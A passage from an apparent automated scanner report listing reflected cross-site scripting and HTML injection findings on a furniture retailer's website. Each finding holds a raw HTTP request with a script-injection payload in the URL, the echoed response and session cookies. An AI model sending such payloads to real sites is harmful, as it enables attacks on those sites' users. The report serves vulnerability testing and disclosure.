Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=55d4a97e1e7b407da97f4782754d124e; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.31.9.1317385225447; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:09:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384ae0e1f563e5ffdce; path=/
Vary: User-Agent
Content-Length: 11972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/Library Furniture 20 no.html72f0a<a>7a179e9882c doesn't exist.</div>
...[SNIP]...

3.372. http://www.hertzfurniture.com/Library-Furniture--20--no.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /Library-Furniture--20--no.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8021"><script>alert(1)</script>2b9f91d37bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Library-Furniture--20--no.htmle8021"><script>alert(1)</script>2b9f91d37bc HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/search.php?find-box=xss%20circle%20shoes
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=55d4a97e1e7b407da97f4782754d124e; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.31.9.1317385225447; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:09:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384ae0e1f563e5ffdce; path=/
Vary: User-Agent
Content-Length: 12020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/Library-Furniture--20--no.htmle8021"><script>alert(1)</script>2b9f91d37bc" />
...[SNIP]...

3.373. http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /Outdoor-Directories--38--ca.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d350"><script>alert(1)</script>78772bb2137 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Outdoor-Directories--38--ca.html2d350"><script>alert(1)</script>78772bb2137 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/church-furniture.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.16.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=f3bdb4878e1749588aef3d1c1087f699; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:05:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 12024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html2d350"><script>alert(1)</script>78772bb2137" />
...[SNIP]...

3.374. http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /Outdoor-Directories--38--ca.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31dc5<a>67661c6aa7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Outdoor-Directories--38--ca.html31dc5<a>67661c6aa7b HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/church-furniture.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.16.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=f3bdb4878e1749588aef3d1c1087f699; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:36:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 11976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/Outdoor Directories 38 ca.html31dc5<a>67661c6aa7b doesn't exist.</div>
...[SNIP]...

3.375. http://www.hertzfurniture.com/Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43c6e"><script>alert(1)</script>0e4dca14678 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html43c6e"><script>alert(1)</script>0e4dca14678 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=f3bdb4878e1749588aef3d1c1087f699; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.18.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:36:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 12126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html43c6e"><script>alert(1)</script>0e4dca14678" />
...[SNIP]...

3.376. http://www.hertzfurniture.com/Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21f87<a>785f12cdc0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html21f87<a>785f12cdc0b HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=f3bdb4878e1749588aef3d1c1087f699; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.18.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:36:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 12078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/Outdoor Directories Single Sided Alum Outdoor Readerboard Colored 5636 mo.html21f87<a>785f12cdc0b doesn't exist.</div>
...[SNIP]...

3.377. http://www.hertzfurniture.com/cart.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /cart.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eebbf<a>140c6ba9346 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cart.phpeebbf<a>140c6ba9346 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html?wfvar=d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.14.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:05:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 11928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/cart.phpeebbf<a>140c6ba9346 doesn't exist.</div>
...[SNIP]...

3.378. http://www.hertzfurniture.com/cart.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /cart.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2e05"><script>alert(1)</script>0b53e75a9c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cart.phpe2e05"><script>alert(1)</script>0b53e75a9c8 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html?wfvar=d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.14.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:05:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 11976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/cart.phpe2e05"><script>alert(1)</script>0b53e75a9c8" />
...[SNIP]...

3.379. http://www.hertzfurniture.com/cart.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /cart.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b3c"><script>alert(1)</script>7b1f51b6164 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cart.php/a7b3c"><script>alert(1)</script>7b1f51b6164 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html?wfvar=d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.14.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:35:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855%2527%2527; path=/
Vary: User-Agent
Content-Length: 13695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<link rel="canonical" href="http://www.hertzfurniture.com/cart.php/a7b3c"><script>alert(1)</script>7b1f51b6164" />
...[SNIP]...

3.380. http://www.hertzfurniture.com/cart.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hertzfurniture.com
Path:   /cart.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f9226<a>6734d7358b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cart.php/f9226<a>6734d7358b7 HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html?wfvar=d
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.14.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:04:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855%2527%2527; path=/
Vary: User-Agent
Content-Length: 13647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" version="-//W3C//DTD XHTML 1.1//
...[SNIP]...
<div class="url">The requested URL www.hertzfurniture.com/cart.php f9226<a>6734d7358b7 doesn't exist.</div>
...[SNIP]...

3.381. http://www.hertzfurniture.com/cart.php/1' [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hertzfurniture.com
Path:   /cart.php/1'

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 471bc"><script>alert(1)</script>422ffc091eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cart.php471bc"><script>alert(1)</script>422ffc091eb/1' HTTP/1.1
Host: www.hertzfurniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.20.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=e2cab9cacd26447c8458e2fa0b603377; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 30 Sep 2011 12:05:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/
Vary: User-Agent
Content-Length: 11982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


